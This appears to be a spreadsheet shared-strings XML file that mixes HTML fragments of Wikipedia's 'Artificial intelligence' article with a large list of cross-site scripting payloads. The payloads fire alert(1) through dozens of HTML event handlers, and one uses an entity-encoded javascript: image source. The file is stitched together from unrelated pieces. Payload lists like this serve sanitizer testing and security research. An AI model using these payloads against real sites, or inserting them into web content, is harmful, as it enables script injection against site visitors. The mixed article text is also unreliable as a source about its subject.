    <t xml:space="preserve">&lt;li id="cite_note-55"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-55"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;embed onkeyup="alert(1)" contenteditable&gt;test&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;label draggable="true" ondragstart="alert(1)"&gt;test&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;input id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/input&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;ins onmouseover="alert(1)"&gt;test&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;progress onpointerout=alert(1)&gt;XSS&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, p.&amp;#160;939 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;cite ondblclick="alert(1)"&gt;test&lt;/cite&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=27" title="Edit section: Search and optimization"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;img2 onpointerover=alert(1)&gt;XSS&lt;/img2&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Universal_basic_income" class="mw-redirect" title="Universal basic income"&gt;Universal basic income &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;details onmouseleave="alert(1)"&gt;test&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;body onmessage=alert(1)&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=BBC+News&amp;amp;rft.atitle=Artificial+intelligence+%27as+good+as+cancer+doctors%27&amp;amp;rft.date=2017-01-26&amp;amp;rft.aulast=Gallagher&amp;amp;rft.aufirst=James&amp;amp;rft_id=https%3A%2F%2Fwww.bbc.co.uk%2Fnews%2Fhealth-38717928&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;frame onbeforecopy="alert(1)" contenteditable&gt;test&lt;/frame&gt;</t>
  </si>
  <si>
    <t>&lt;dir onpaste="alert(1)" contenteditable&gt;test&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;command id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/command&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Intuition-109"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-Intuition_109-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Intuition_109-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;</t>
  </si>
  <si>
    <t>&lt;bdi onkeydown="alert(1)" contenteditable&gt;test&lt;/bdi&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">      &lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;img id=x tabindex=1 onfocus=alert(1)&gt;&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;content id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/content&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>Second &lt;a href="/wiki/AI_winter" title="AI winter"&gt;AI winter &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;acronym id=x tabindex=1 onfocus=alert(1)&gt;&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;span onpointerup=alert(1)&gt;XSS&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption draggable="true" ondragend="alert(1)"&gt;test&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;xmp id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;ol draggable="true" ondragend="alert(1)"&gt;test&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;tt onload=alert(1)&gt;&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;caption onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/caption&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-lstm-266"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-lstm_266-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;b onmousemove="alert(1)"&gt;test&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;strong onpointerup=alert(1)&gt;XSS&lt;/strong&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;Related topics &lt;/th&gt;&lt;td class="navbox-list navbox-odd" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"&gt;&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;ul onpaste="alert(1)" contenteditable&gt;test&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound draggable="true" ondragenter="alert(1)"&gt;test&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Transhumanism </t>
  </si>
  <si>
    <t>&lt;noframes draggable="true" ondrag="alert(1)"&gt;test&lt;/noframes&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; 2011 </t>
  </si>
  <si>
    <t>&lt;aside onpointerdown=alert(1)&gt;XSS&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;basefont onload=alert(1)&gt;&lt;/basefont&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;div class="thumbinner" style="width:222px;"&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Empirical_evidence" title="Empirical evidence"&gt;Empirical evidence &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;rb ondblclick="alert(1)"&gt;test&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Artificial_development" title="Artificial development"&gt;Artificial development &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;image id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;ul id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;listing onpointerdown=alert(1)&gt;XSS&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;iframe id=x onfocus=alert(1)&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-liwu2015-270"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-liwu2015_270-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;i onclick="alert(1)"&gt;test&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;svg onmousemove="alert(1)"&gt;test&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Control_theory" title="Control theory"&gt;Control theory &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;rb onpointerdown=alert(1)&gt;XSS&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;content onmouseenter="alert(1)"&gt;test&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Martin_Rees" title="Martin Rees"&gt;Martin Rees &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTEO&amp;#39;BrienMarakas2011-286"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTEO&amp;#39;BrienMarakas2011_286-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;picture oncontextmenu="alert(1)"&gt;test&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;dir id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;s onmousemove="alert(1)"&gt;test&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;dd onmouseenter="alert(1)"&gt;test&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;dl&gt;&lt;dt&gt;&lt;i&gt;Gödelian arguments &lt;/i&gt; &lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Robot designer &lt;a href="/wiki/Hans_Moravec" title="Hans Moravec"&gt;Hans Moravec &lt;/a&gt;, cyberneticist &lt;a href="/wiki/Kevin_Warwick" title="Kevin Warwick"&gt;Kevin Warwick &lt;/a&gt; and inventor &lt;a href="/wiki/Ray_Kurzweil" title="Ray Kurzweil"&gt;Ray Kurzweil &lt;/a&gt; have predicted that humans and machines will merge in the future into &lt;a href="/wiki/Cyborg" title="Cyborg"&gt;cyborgs &lt;/a&gt; that are more capable and powerful than either.&lt;sup id="cite_ref-Transhumanism_411-0" class="reference"&gt;&lt;a href="#cite_note-Transhumanism-411"&gt;&amp;#91;399&amp;#93; &lt;/a&gt; &lt;/sup&gt; This idea, called &lt;a href="/wiki/Transhumanism" title="Transhumanism"&gt;transhumanism &lt;/a&gt;, has roots in &lt;a href="/wiki/Aldous_Huxley" title="Aldous Huxley"&gt;Aldous Huxley &lt;/a&gt; and &lt;a href="/wiki/Robert_Ettinger" title="Robert Ettinger"&gt;Robert Ettinger &lt;/a&gt;.</t>
  </si>
  <si>
    <t>&lt;span draggable="true" ondragstart="alert(1)"&gt;test&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Subjectivity" title="Subjectivity"&gt;Polycontexturality &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;noframes onmousedown="alert(1)"&gt;test&lt;/noframes&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Fortune&amp;amp;rft.atitle=Why+Deep+Learning+Is+Suddenly+Changing+Your+Life&amp;amp;rft.date=2016&amp;amp;rft_id=http%3A%2F%2Ffortune.com%2Fai-artificial-intelligence-deep-machine-learning%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;script draggable="true" ondragenter="alert(1)"&gt;test&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;meta onmouseup="alert(1)"&gt;test&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;strike draggable="true" ondrag="alert(1)"&gt;test&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;tt onpointerover=alert(1)&gt;XSS&lt;/tt&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-367"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-367"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;aside id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Charles_Sanders_Peirce" title="Charles Sanders Peirce"&gt;Charles Sanders Peirce &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;code onmouseleave="alert(1)"&gt;test&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;command draggable="true" ondragstart="alert(1)"&gt;test&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;wbr onpaste="alert(1)" contenteditable&gt;test&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;meter onpaste="alert(1)" contenteditable&gt;test&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;strong onclick="alert(1)"&gt;test&lt;/strong&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTEDomingos2015Chapter_5-63"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTEDomingos2015Chapter_5_63-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;table id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/table&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=12" title="Edit section: Social intelligence"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;template draggable="true" ondragstart="alert(1)"&gt;test&lt;/template&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;E McGaughey, 'Will Robots Automate Your Job Away? Full Employment, Basic Income, and Economic Democracy' (2018) &lt;a rel="nofollow" class="external text" href="https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3044448"&gt;SSRN, part 2(3) &lt;/a&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;i&gt;AI Matters &lt;/i&gt;. &lt;b&gt;1 &lt;/b&gt; (1): 9–11. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1145%2F2639475.2639478"&gt;10.1145/2639475.2639478 &lt;/a&gt;. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20160115114604/http://www.sophia.de/pdf/2014_PT-AI_polls.pdf"&gt;Archived &lt;/a&gt; &lt;span class="cs1-format"&gt;(PDF) </t>
  </si>
  <si>
    <t>&lt;body onpopstate=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;var id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFACM1998"&gt;ACM 1998 &lt;/a&gt;, ~I.2.7 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;param onclick="alert(1)"&gt;test&lt;/param&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-54"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-54"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;rb id=x tabindex=1 onactivate=alert(1)&gt;&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;dialog onmouseenter="alert(1)"&gt;test&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;li id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;spacer onmouseleave="alert(1)"&gt;test&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot draggable="true" ondragstart="alert(1)"&gt;test&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;input type=image onloadend=alert(1) src=validimage.png&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Technological_singularity" title="Technological singularity"&gt;Technological singularity &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;mark onkeydown="alert(1)" contenteditable&gt;test&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;749–752 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;menu draggable="true" ondragend="alert(1)"&gt;test&lt;/menu&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;a href="/wiki/Affective_computing" title="Affective computing"&gt;Affective computing &lt;/a&gt; is an interdisciplinary umbrella that comprises systems which recognize, interpret, process, or simulate human </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Machine_perception-124"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Machine_perception_124-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;script ondragover=alert(1) contenteditable&gt;drop here&lt;/script&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;dd&gt;&lt;a href="/en/0.20/"&gt;0.20&lt;/a&gt;&lt;/dd&gt;       </t>
  </si>
  <si>
    <t>&lt;noscript onmouseout="alert(1)"&gt;test&lt;/noscript&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFPoliLangdonMcPhee2008" class="citation book"&gt;Poli, R.; Langdon, W. B.; McPhee, N. F. (2008). &lt;a rel="nofollow" class="external text" href="http://www.gp-field-guide.org.uk/"&gt;&lt;i&gt;A Field Guide to Genetic Programming &lt;/i&gt; &lt;/a&gt;. Lulu.com. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-1-4092-0073-4" title="Special:BookSources/978-1-4092-0073-4"&gt;&lt;bdi&gt;978-1-4092-0073-4 &lt;/bdi&gt; &lt;/a&gt; &amp;#8211; via gp-field-guide.org.uk. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=A+Field+Guide+to+Genetic+Programming&amp;amp;rft.pub=Lulu.com&amp;amp;rft.date=2008&amp;amp;rft.isbn=978-1-4092-0073-4&amp;amp;rft.aulast=Poli&amp;amp;rft.aufirst=R.&amp;amp;rft.au=Langdon%2C+W.+B.&amp;amp;rft.au=McPhee%2C+N.+F.&amp;amp;rft_id=http%3A%2F%2Fwww.gp-field-guide.org.uk%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;p&gt;Machine learning (ML), a fundamental concept of AI research since the field's inception,&lt;sup id="cite_ref-115" class="reference"&gt;&lt;a href="#cite_note-115"&gt;&amp;#91;112&amp;#93; &lt;/a&gt; &lt;/sup&gt; is the study of computer algorithms that improve automatically through experience.&lt;sup id="cite_ref-116" class="reference"&gt;&lt;a href="#cite_note-116"&gt;&amp;#91;113&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-Machine_learning_117-0" class="reference"&gt;&lt;a href="#cite_note-Machine_learning-117"&gt;&amp;#91;114&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-65"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-65"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;spacer onmouseout="alert(1)"&gt;test&lt;/spacer&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;R. J. Williams and D. Zipser. Gradient-based learning algorithms for recurrent networks and their computational complexity. In Back-propagation: Theory, Architectures and Applications. Hillsdale, NJ: Erlbaum, 1994. </t>
  </si>
  <si>
    <t>&lt;th draggable="true" ondragenter="alert(1)"&gt;test&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;summary id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;isindex type=image src=1 onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;li onpaste="alert(1)" contenteditable&gt;test&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;button ondragover=alert(1) contenteditable&gt;drop here&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;html style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;kbd oncontextmenu="alert(1)"&gt;test&lt;/kbd&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Many AI algorithms are capable of learning from data; they can enhance themselves by learning new &lt;a href="/wiki/Heuristic_(computer_science)" title="Heuristic (computer science)"&gt;heuristics &lt;/a&gt; (strategies, or "rules of thumb", that have worked well in the past), or can themselves write other algorithms. Some of the "learners" described below, including Bayesian networks, decision trees, and nearest-neighbor, could theoretically, (given infinite data, time, and memory) learn to approximate any &lt;a href="/wiki/Function_(mathematics)" title="Function (mathematics)"&gt;function &lt;/a&gt;, including which combination of mathematical functions would best describe the world&lt;sup class="noprint Inline-Template Template-Fact" style="white-space:nowrap;"&gt;&amp;#91;&lt;i&gt;&lt;a href="/wiki/Wikipedia:Citation_needed" title="Wikipedia:Citation needed"&gt;&lt;span title="This claim needs references to reliable sources. (June 2019)"&gt;citation needed </t>
  </si>
  <si>
    <t>&lt;blink onpointerover=alert(1)&gt;XSS&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Thomas_Kuhn" title="Thomas Kuhn"&gt;Thomas Kuhn &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h2&gt;&lt;span class="mw-headline" id="History"&gt;History </t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;div class="mw-indicators mw-body-content"&gt;</t>
  </si>
  <si>
    <t>&lt;em draggable="true" ondragenter="alert(1)"&gt;test&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;ol onpointerdown=alert(1)&gt;XSS&lt;/ol&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-359"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-359"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;dir onmouseleave="alert(1)"&gt;test&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;address onpointerup=alert(1)&gt;XSS&lt;/address&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;Clark, Jack. &lt;a rel="nofollow" class="external text" href="https://www.bloomberg.com/news/articles/2015-07-01/musk-backed-group-probes-risks-behind-artificial-intelligence"&gt;"Musk-Backed Group Probes Risks Behind Artificial Intelligence" &lt;/a&gt;. &lt;i&gt;Bloomberg.com &lt;/i&gt;. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20151030202356/http://www.bloomberg.com/news/articles/2015-07-01/musk-backed-group-probes-risks-behind-artificial-intelligence"&gt;Archived &lt;/a&gt; from the original on 30 October 2015&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;30 October </t>
  </si>
  <si>
    <t>&lt;strong onblur=alert(1) tabindex=1 id=x&gt;&lt;/strong&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote onmousemove="alert(1)"&gt;test&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;datalist id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/datalist&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;div class="portal" role="navigation" id="p-lang"  aria-labelledby="p-lang-label"&gt;</t>
  </si>
  <si>
    <t>&lt;basefont onbeforecut="alert(1)" contenteditable&gt;test&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;canvas draggable="true" ondragenter="alert(1)"&gt;test&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;sub onblur=alert(1) tabindex=1 id=x&gt;&lt;/sub&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="thumb tright"&gt;</t>
  </si>
  <si>
    <t>&lt;td id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;image3 onpointermove=alert(1)&gt;XSS&lt;/image3&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Instrumental_convergence" title="Instrumental convergence"&gt;Instrumental convergence &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;em style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;table onmouseup="alert(1)"&gt;test&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;base ondrop=alert(1) contenteditable&gt;drop here&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Software_development_process" title="Software development process"&gt;Software development process &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;title onload=alert(1)&gt;&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;body id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;div oncut="alert(1)" contenteditable&gt;test&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;strike onmouseout="alert(1)"&gt;test&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;hgroup id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;li style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-174"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-174"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;footer onload=alert(1)&gt;&lt;/footer&gt;</t>
  </si>
  <si>
